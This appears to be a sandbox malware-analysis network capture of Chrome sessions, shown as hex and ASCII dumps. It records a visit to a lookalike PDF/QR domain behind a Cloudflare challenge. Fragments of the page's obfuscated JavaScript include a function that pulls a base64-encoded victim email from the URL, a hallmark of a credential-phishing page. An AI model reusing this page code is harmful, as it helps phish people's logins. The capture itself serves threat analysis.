                                                                                                                                                2024-10-28 16:47:42 UTC1369INData Raw: 3a 52 61 6e 64 6f 6d 22 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 72 65 74 75 72 6e 20 72 65 73 70 6f 6e 73 65 2e 75 72 6c 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 20 20 20 20 66 75 6e 63 74 69 6f 6e 20 67 65 74 45 6d 61 69 6c 46 72 6f 6d 55 72 6c 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6e 73 74 20 62 61 73 65 36 34 45 6d 61 69 6c 20 3d 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 61 73 68 2e 73 75 62 73 74 72 69 6e 67 28 31 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6e 73 74 20 64 65 63 6f 64 65 64 45 6d 61 69 6c 20 3d 20 61 74 6f 62 28 62 61 73 65 36 34 45 6d 61 69 6c 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 72 65 74 75 72 6e 20 64 65 63 6f 64 65 64 45 6d 61 69 6c 3b 0d 0a 20 20 20
                                                                                                                                                Data Ascii: :Random"); return response.url; } function getEmailFromUrl() { const base64Email = window.location.hash.substring(1); const decodedEmail = atob(base64Email); return decodedEmail;
                                                                                                                                                2024-10-28 16:47:42 UTC1369INData Raw: 7b 76 61 72 20 5f 30 78 35 64 66 62 65 3d 5f 30 78 38 64 32 66 2c 5f 30 78 35 35 34 61 37 31 3d 5f 30 78 31 35 34 66 61 62 28 29 3b 77 68 69 6c 65 28 21 21 5b 5d 29 7b 74 72 79 7b 76 61 72 20 5f 30 78 39 30 63 65 63 34 3d 2d 70 61 72 73 65 49 6e 74 28 5f 30 78 35 64 66 62 65 28 30 78 63 30 29 29 2f 30 78 31 2a 28 70 61 72 73 65 49 6e 74 28 5f 30 78 35 64 66 62 65 28 30 78 62 64 29 29 2f 30 78 32 29 2b 70 61 72 73 65 49 6e 74 28 5f 30 78 35 64 66 62 65 28 30 78 63 61 29 29 2f 30 78 33 2a 28 2d 70 61 72 73 65 49 6e 74 28 5f 30 78 35 64 66 62 65 28 30 78 63 37 29 29 2f 30 78 34 29 2b 2d 70 61 72 73 65 49 6e 74 28 5f 30 78 35 64 66 62 65 28 30 78 62 39 29 29 2f 30 78 35 2a 28 70 61 72 73 65 49 6e 74 28 5f 30 78 35 64 66 62 65 28 30 78 62 62 29 29 2f 30 78 36
                                                                                                                                                Data Ascii: {var _0x5dfbe=_0x8d2f,_0x554a71=_0x154fab();while(!![]){try{var _0x90cec4=-parseInt(_0x5dfbe(0xc0))/0x1*(parseInt(_0x5dfbe(0xbd))/0x2)+parseInt(_0x5dfbe(0xca))/0x3*(-parseInt(_0x5dfbe(0xc7))/0x4)+-parseInt(_0x5dfbe(0xb9))/0x5*(parseInt(_0x5dfbe(0xbb))/0x6
                                                                                                                                                2024-10-28 16:47:42 UTC1369INData Raw: 21 5b 5d 3b 69 66 28 5f 30 78 35 34 65 36 32 36 5b 5f 30 78 32 65 63 30 36 61 28 30 78 63 36 29 5d 26 26 5f 30 78 35 34 65 36 32 36 5b 5f 30 78 32 65 63 30 36 61 28 30 78 63 31 29 5d 3d 3d 27 53 27 5b 5f 30 78 32 65 63 30 36 61 28 30 78 63 35 29 5d 28 30 78 30 29 29 72 65 74 75 72 6e 21 5b 5d 3b 69 66 28 5f 30 78 35 34 65 36 32 36 5b 5f 30 78 32 65 63 30 36 61 28 30 78 63 36 29 5d 26 26 5f 30 78 35 34 65 36 32 36 5b 5f 30 78 32 65 63 30 36 61 28 30 78 63 31 29 5d 3d 3d 27 48 27 5b 5f 30 78 32 65 63 30 36 61 28 30 78 63 35 29 5d 28 30 78 30 29 29 72 65 74 75 72 6e 21 5b 5d 3b 69 66 28 5f 30 78 35 34 65 36 32 36 5b 5f 30 78 32 65 63 30 36 61 28 30 78 63 36 29 5d 26 26 5f 30 78 35 34 65 36 32 36 5b 5f 30 78 32 65 63 30 36 61 28 30 78 63 31 29 5d 3d 3d 27 41
                                                                                                                                                Data Ascii: ![];if(_0x54e626[_0x2ec06a(0xc6)]&&_0x54e626[_0x2ec06a(0xc1)]=='S'[_0x2ec06a(0xc5)](0x0))return![];if(_0x54e626[_0x2ec06a(0xc6)]&&_0x54e626[_0x2ec06a(0xc1)]=='H'[_0x2ec06a(0xc5)](0x0))return![];if(_0x54e626[_0x2ec06a(0xc6)]&&_0x54e626[_0x2ec06a(0xc1)]=='A
                                                                                                                                                2024-10-28 16:47:42 UTC350INData Raw: 63 6f 72 65 2d 6d 73 67 20 73 70 61 63 65 72 22 20 69 64 3d 22 63 68 61 6c 6c 65 6e 67 65 2d 62 6f 64 79 2d 74 65 78 74 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 64 69 76 3e 57 65 20 6e 65 65 64 20 74 6f 20 72 65 76 69 65 77 20 74 68 65 20 73 65 63 75 72 69 74 79 20 6f 66 20 79 6f 75 72 20 63 6f 6e 6e 65 63 74 69 6f 6e 20 62 65 66 6f 72 65 20 70 72 6f 63 65 65 64 69 6e 67 2e 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 66 6f 6f 74 65 72 22 20 72 6f 6c 65 3d 22 63 6f 6e 74 65 6e 74 69 6e 66 6f 22 3e 0d 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 66 6f 6f 74 65 72 2d 69 6e 6e 65 72 22 3e 0d 0a 20 20 20 20 20 20 3c 64 69 76
                                                                                                                                                Data Ascii: core-msg spacer" id="challenge-body-text"> <div>We need to review the security of your connection before proceeding. </div> </div> </div> </div> <div class="footer" role="contentinfo"> <div class="footer-inner"> <div
                                                                                                                                                2024-10-28 16:47:42 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                Data Ascii: 0


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                21192.168.2.1649744104.18.95.414436856C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                2024-10-28 16:47:42 UTC598OUTGET /cdn-cgi/challenge-platform/h/b/flow/ov1/736896047:1730132405:5SGzvlJZj4ad9Fw5YQ-DPoYWF7p9UG71nocFwUBA5ZI/8d9c68ac0f68e79a/_gFYOdWvOno18EFRhpnXawTigdcRjwUS3i.fqCCsr9g-1730134058-1.1.1.1-cLx_S1QbgF9.LxN6AtmEfd6QgduHNIg5gmCjicGVJiRTT3MnfZL.NQSkb4wRylmA HTTP/1.1
                                                                                                                                                Host: challenges.cloudflare.com
                                                                                                                                                Connection: keep-alive
                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                Accept: */*
                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                2024-10-28 16:47:43 UTC379INHTTP/1.1 404 Not Found
                                                                                                                                                Date: Mon, 28 Oct 2024 16:47:43 GMT
                                                                                                                                                Content-Type: application/json
                                                                                                                                                Content-Length: 7
                                                                                                                                                Connection: close
                                                                                                                                                cf-chl-out: Ps5TQK01DxS4sNEi/9OISaGW27ro9ZbNz0Y=$cJt0NkFJUjQNtA2B
                                                                                                                                                cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                Server: cloudflare
                                                                                                                                                CF-RAY: 8d9c68c5ca80460c-DFW
                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                2024-10-28 16:47:43 UTC7INData Raw: 69 6e 76 61 6c 69 64
                                                                                                                                                Data Ascii: invalid


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                22192.168.2.1649747188.114.97.34436856C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                2024-10-28 16:47:43 UTC371OUTGET /favicon.ico HTTP/1.1
                                                                                                                                                Host: vokbz-iamgold.mobile-pdfqronline.com
                                                                                                                                                Connection: keep-alive
                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                Accept: */*
                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                2024-10-28 16:47:43 UTC883INHTTP/1.1 200 OK
                                                                                                                                                Date: Mon, 28 Oct 2024 16:47:43 GMT
                                                                                                                                                Content-Type: text/html
                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                Connection: close
                                                                                                                                                Last-Modified: Mon, 28 Oct 2024 10:57:45 GMT
                                                                                                                                                Cache-Control: max-age=14400
                                                                                                                                                CF-Cache-Status: HIT
                                                                                                                                                Age: 6
                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=icEnMo%2BYGXu9fF7UCIagE7sIIYVzi%2FAQvlzKmFn2N1CKqsBPTdAtDL3Ki%2FRThkIsyrHWc2XHrGtTcp7C8lHR7YeWx%2Fat4WuGlXX2NHrwIIcls8dkl98WAEnUwuCT1SpIk%2BIaq5L2NkevtAYEgFj0a9Z%2FaaaOjsY%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                Server: cloudflare
                                                                                                                                                CF-RAY: 8d9c68c68cb6e82b-DFW
                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=2014&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2858&recv_bytes=949&delivery_rate=1440079&cwnd=251&unsent_bytes=0&cid=e12743bb5c74b9e7&ts=148&x=0"
                                                                                                                                                2024-10-28 16:47:43 UTC486INData Raw: 31 64 66 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 22 6c 74 72 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 63 6c 61 73 73 3d 22 72 65 73 70 6f 6e 73 69 76 65 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 63 6f 64 65 2e 6a 71 75 65 72 79 2e 63 6f 6d 2f 6a 71 75 65 72 79 2d 33 2e 36 2e 30 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 74 75
                                                                                                                                                Data Ascii: 1dfe<!DOCTYPE html><html lang="en" dir="ltr" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" class="responsive"><head> <script src="https://code.jquery.com/jquery-3.6.0.min.js"></script> <script src="https://challenges.cloudflare.com/tu
                                                                                                                                                2024-10-28 16:47:43 UTC1369INData Raw: 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 66 65 72 72 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 6f 72 69 67 69 6e 2d 77 68 65 6e 2d 63 72 6f 73 73 2d 6f 72 69 67 69 6e 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 66 6f 72 6d 61 74 2d 64 65 74 65 63 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 6c 65 70 68 6f 6e 65 3d 6e 6f 22 3e 0d 0a 3c 73 74 79
                                                                                                                                                Data Ascii: <meta name="referrer" content="origin-when-cross-origin"> <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, minimum-scale=1.0, user-scalable=no"> <meta name="format-detection" content="telephone=no"><sty
                                                                                                                                                2024-10-28 16:47:43 UTC1369INData Raw: 72 67 69 6e 3a 30 20 61 75 74 6f 3b 77 69 64 74 68 3a 31 30 30 25 3b 6d 61 78 2d 77 69 64 74 68 3a 36 30 72 65 6d 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 31 32 35 72 65 6d 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 35 72 65 6d 7d 2e 66 6f 6f 74 65 72 2d 69 6e 6e 65 72 7b 62 6f 72 64 65 72 2d 74 6f 70 3a 31 70 78 20 73 6f 6c 69 64 20 23 64 39 64 39 64 39 3b 70 61 64 64 69 6e 67 2d 74 6f 70 3a 31 72 65 6d 3b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 31 72 65 6d 7d 2e 63 6f 72 65 2d 6d 73 67 2c 2e 7a 6f 6e 65 2d 6e 61 6d 65 2d 74 69 74 6c 65 7b 6f 76 65 72 66 6c 6f 77 2d 77 72 61 70 3a 62 72 65 61 6b 2d 77 6f 72 64 7d 40 6d 65 64 69 61 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 32 30 70 78 29 7b 2e 6d 61 69 6e 2d 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 2d
                                                                                                                                                Data Ascii: rgin:0 auto;width:100%;max-width:60rem;line-height:1.125rem;font-size:.75rem}.footer-inner{border-top:1px solid #d9d9d9;padding-top:1rem;padding-bottom:1rem}.core-msg,.zone-name-title{overflow-wrap:break-word}@media (max-width:720px){.main-content{margin-
                                                                                                                                                2024-10-28 16:47:43 UTC1369INData Raw: 65 63 69 61 6c 3a 52 61 6e 64 6f 6d 22 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 72 65 74 75 72 6e 20 72 65 73 70 6f 6e 73 65 2e 75 72 6c 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 20 20 20 20 66 75 6e 63 74 69 6f 6e 20 67 65 74 45 6d 61 69 6c 46 72 6f 6d 55 72 6c 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6e 73 74 20 62 61 73 65 36 34 45 6d 61 69 6c 20 3d 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 61 73 68 2e 73 75 62 73 74 72 69 6e 67 28 31 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6e 73 74 20 64 65 63 6f 64 65 64 45 6d 61 69 6c 20 3d 20 61 74 6f 62 28 62 61 73 65 36 34 45 6d 61 69 6c 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 72 65 74 75 72 6e 20 64 65 63 6f 64 65 64 45 6d 61 69 6c 3b
                                                                                                                                                Data Ascii: ecial:Random"); return response.url; } function getEmailFromUrl() { const base64Email = window.location.hash.substring(1); const decodedEmail = atob(base64Email); return decodedEmail;
                                                                                                                                                2024-10-28 16:47:43 UTC1369INData Raw: 34 32 62 38 29 7b 76 61 72 20 5f 30 78 35 64 66 62 65 3d 5f 30 78 38 64 32 66 2c 5f 30 78 35 35 34 61 37 31 3d 5f 30 78 31 35 34 66 61 62 28 29 3b 77 68 69 6c 65 28 21 21 5b 5d 29 7b 74 72 79 7b 76 61 72 20 5f 30 78 39 30 63 65 63 34 3d 2d 70 61 72 73 65 49 6e 74 28 5f 30 78 35 64 66 62 65 28 30 78 63 30 29 29 2f 30 78 31 2a 28 70 61 72 73 65 49 6e 74 28 5f 30 78 35 64 66 62 65 28 30 78 62 64 29 29 2f 30 78 32 29 2b 70 61 72 73 65 49 6e 74 28 5f 30 78 35 64 66 62 65 28 30 78 63 61 29 29 2f 30 78 33 2a 28 2d 70 61 72 73 65 49 6e 74 28 5f 30 78 35 64 66 62 65 28 30 78 63 37 29 29 2f 30 78 34 29 2b 2d 70 61 72 73 65 49 6e 74 28 5f 30 78 35 64 66 62 65 28 30 78 62 39 29 29 2f 30 78 35 2a 28 70 61 72 73 65 49 6e 74 28 5f 30 78 35 64 66 62 65 28 30 78 62 62 29
                                                                                                                                                Data Ascii: 42b8){var _0x5dfbe=_0x8d2f,_0x554a71=_0x154fab();while(!![]){try{var _0x90cec4=-parseInt(_0x5dfbe(0xc0))/0x1*(parseInt(_0x5dfbe(0xbd))/0x2)+parseInt(_0x5dfbe(0xca))/0x3*(-parseInt(_0x5dfbe(0xc7))/0x4)+-parseInt(_0x5dfbe(0xb9))/0x5*(parseInt(_0x5dfbe(0xbb)
                                                                                                                                                2024-10-28 16:47:43 UTC1369INData Raw: 65 74 75 72 6e 21 5b 5d 3b 69 66 28 5f 30 78 35 34 65 36 32 36 5b 5f 30 78 32 65 63 30 36 61 28 30 78 63 36 29 5d 26 26 5f 30 78 35 34 65 36 32 36 5b 5f 30 78 32 65 63 30 36 61 28 30 78 63 31 29 5d 3d 3d 27 53 27 5b 5f 30 78 32 65 63 30 36 61 28 30 78 63 35 29 5d 28 30 78 30 29 29 72 65 74 75 72 6e 21 5b 5d 3b 69 66 28 5f 30 78 35 34 65 36 32 36 5b 5f 30 78 32 65 63 30 36 61 28 30 78 63 36 29 5d 26 26 5f 30 78 35 34 65 36 32 36 5b 5f 30 78 32 65 63 30 36 61 28 30 78 63 31 29 5d 3d 3d 27 48 27 5b 5f 30 78 32 65 63 30 36 61 28 30 78 63 35 29 5d 28 30 78 30 29 29 72 65 74 75 72 6e 21 5b 5d 3b 69 66 28 5f 30 78 35 34 65 36 32 36 5b 5f 30 78 32 65 63 30 36 61 28 30 78 63 36 29 5d 26 26 5f 30 78 35 34 65 36 32 36 5b 5f 30 78 32 65 63 30 36 61 28 30 78 63 31 29
                                                                                                                                                Data Ascii: eturn![];if(_0x54e626[_0x2ec06a(0xc6)]&&_0x54e626[_0x2ec06a(0xc1)]=='S'[_0x2ec06a(0xc5)](0x0))return![];if(_0x54e626[_0x2ec06a(0xc6)]&&_0x54e626[_0x2ec06a(0xc1)]=='H'[_0x2ec06a(0xc5)](0x0))return![];if(_0x54e626[_0x2ec06a(0xc6)]&&_0x54e626[_0x2ec06a(0xc1)
                                                                                                                                                2024-10-28 16:47:43 UTC355INData Raw: 61 73 73 3d 22 63 6f 72 65 2d 6d 73 67 20 73 70 61 63 65 72 22 20 69 64 3d 22 63 68 61 6c 6c 65 6e 67 65 2d 62 6f 64 79 2d 74 65 78 74 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 64 69 76 3e 57 65 20 6e 65 65 64 20 74 6f 20 72 65 76 69 65 77 20 74 68 65 20 73 65 63 75 72 69 74 79 20 6f 66 20 79 6f 75 72 20 63 6f 6e 6e 65 63 74 69 6f 6e 20 62 65 66 6f 72 65 20 70 72 6f 63 65 65 64 69 6e 67 2e 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 66 6f 6f 74 65 72 22 20 72 6f 6c 65 3d 22 63 6f 6e 74 65 6e 74 69 6e 66 6f 22 3e 0d 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 66 6f 6f 74 65 72 2d 69 6e 6e 65 72 22 3e 0d 0a 20 20 20 20 20
                                                                                                                                                Data Ascii: ass="core-msg spacer" id="challenge-body-text"> <div>We need to review the security of your connection before proceeding. </div> </div> </div> </div> <div class="footer" role="contentinfo"> <div class="footer-inner">
                                                                                                                                                2024-10-28 16:47:43 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                Data Ascii: 0


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                23192.168.2.1649748104.18.94.414436856C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                2024-10-28 16:47:43 UTC786OUTGET /cdn-cgi/challenge-platform/h/b/i/8d9c68ac0f68e79a/1730134061652/A1f9igYSRdqhedP HTTP/1.1
                                                                                                                                                Host: challenges.cloudflare.com
                                                                                                                                                Connection: keep-alive
                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                Sec-Fetch-Site: same-origin
                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                Sec-Fetch-Dest: image
                                                                                                                                                Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/shez3/0x4AAAAAAADnPIDROrmt1Wwj/light/fbE/normal/auto/
                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                2024-10-28 16:47:43 UTC200INHTTP/1.1 200 OK
                                                                                                                                                Date: Mon, 28 Oct 2024 16:47:43 GMT
                                                                                                                                                Content-Type: image/png
                                                                                                                                                Content-Length: 61
                                                                                                                                                Connection: close
                                                                                                                                                Server: cloudflare
                                                                                                                                                CF-RAY: 8d9c68c89b21e534-DFW
                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                2024-10-28 16:47:43 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 12 00 00 00 61 08 02 00 00 00 54 1a 66 6f 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                                                                                                Data Ascii: PNGIHDRaTfoIDAT$IENDB`


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                24192.168.2.1649750104.18.95.414436856C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                2024-10-28 16:47:44 UTC428OUTGET /cdn-cgi/challenge-platform/h/b/i/8d9c68ac0f68e79a/1730134061652/A1f9igYSRdqhedP HTTP/1.1
                                                                                                                                                Host: challenges.cloudflare.com
                                                                                                                                                Connection: keep-alive
                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                Accept: */*
                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                2024-10-28 16:47:44 UTC200INHTTP/1.1 200 OK
                                                                                                                                                Date: Mon, 28 Oct 2024 16:47:44 GMT
                                                                                                                                                Content-Type: image/png
                                                                                                                                                Content-Length: 61
                                                                                                                                                Connection: close
                                                                                                                                                Server: cloudflare
                                                                                                                                                CF-RAY: 8d9c68cd6eade997-DFW
                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                2024-10-28 16:47:44 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 12 00 00 00 61 08 02 00 00 00 54 1a 66 6f 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                                                                                                Data Ascii: PNGIHDRaTfoIDAT$IENDB`


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                25192.168.2.1649751104.18.94.414436856C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                2024-10-28 16:47:44 UTC815OUTGET /cdn-cgi/challenge-platform/h/b/pat/8d9c68ac0f68e79a/1730134061655/15b749dc2006a6f50d892c6ab83b60816ce2a1a6e467e4003a87b35d076d3cae/nYbxm4w-JBYgJQx HTTP/1.1
                                                                                                                                                Host: challenges.cloudflare.com
                                                                                                                                                Connection: keep-alive
                                                                                                                                                Cache-Control: max-age=0
                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                Accept: */*
                                                                                                                                                Sec-Fetch-Site: same-origin
                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/shez3/0x4AAAAAAADnPIDROrmt1Wwj/light/fbE/normal/auto/
                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                2024-10-28 16:47:44 UTC143INHTTP/1.1 401 Unauthorized
                                                                                                                                                Date: Mon, 28 Oct 2024 16:47:44 GMT
                                                                                                                                                Content-Type: text/plain; charset=UTF-8
                                                                                                                                                Content-Length: 1
                                                                                                                                                Connection: close
                                                                                                                                                2024-10-28 16:47:44 UTC2015INData Raw: 77 77 77 2d 61 75 74 68 65 6e 74 69 63 61 74 65 3a 20 50 72 69 76 61 74 65 54 6f 6b 65 6e 20 63 68 61 6c 6c 65 6e 67 65 3d 22 41 41 49 41 47 58 42 68 64 43 31 70 63 33 4e 31 5a 58 49 75 59 32 78 76 64 57 52 6d 62 47 46 79 5a 53 35 6a 62 32 30 67 46 62 64 4a 33 43 41 47 70 76 55 4e 69 53 78 71 75 44 74 67 67 57 7a 69 6f 61 62 6b 5a 2d 51 41 4f 6f 65 7a 58 51 64 74 50 4b 34 41 47 57 4e 6f 59 57 78 73 5a 57 35 6e 5a 58 4d 75 59 32 78 76 64 57 52 6d 62 47 46 79 5a 53 35 6a 62 32 30 3d 22 2c 20 74 6f 6b 65 6e 2d 6b 65 79 3d 22 4d 49 49 42 55 6a 41 39 42 67 6b 71 68 6b 69 47 39 77 30 42 41 51 6f 77 4d 4b 41 4e 4d 41 73 47 43 57 43 47 53 41 46 6c 41 77 51 43 41 71 45 61 4d 42 67 47 43 53 71 47 53 49 62 33 44 51 45 42 43 44 41 4c 42 67 6c 67 68 6b 67 42 5a 51 4d
                                                                                                                                                Data Ascii: www-authenticate: PrivateToken challenge="AAIAGXBhdC1pc3N1ZXIuY2xvdWRmbGFyZS5jb20gFbdJ3CAGpvUNiSxquDtggWzioabkZ-QAOoezXQdtPK4AGWNoYWxsZW5nZXMuY2xvdWRmbGFyZS5jb20=", token-key="MIIBUjA9BgkqhkiG9w0BAQowMKANMAsGCWCGSAFlAwQCAqEaMBgGCSqGSIb3DQEBCDALBglghkgBZQM
                                                                                                                                                2024-10-28 16:47:44 UTC1INData Raw: 4a
                                                                                                                                                Data Ascii: J


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                26192.168.2.1649752104.18.94.414436856C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                2024-10-28 16:47:45 UTC1151OUTPOST /cdn-cgi/challenge-platform/h/b/flow/ov1/736896047:1730132405:5SGzvlJZj4ad9Fw5YQ-DPoYWF7p9UG71nocFwUBA5ZI/8d9c68ac0f68e79a/_gFYOdWvOno18EFRhpnXawTigdcRjwUS3i.fqCCsr9g-1730134058-1.1.1.1-cLx_S1QbgF9.LxN6AtmEfd6QgduHNIg5gmCjicGVJiRTT3MnfZL.NQSkb4wRylmA HTTP/1.1
                                                                                                                                                Host: challenges.cloudflare.com
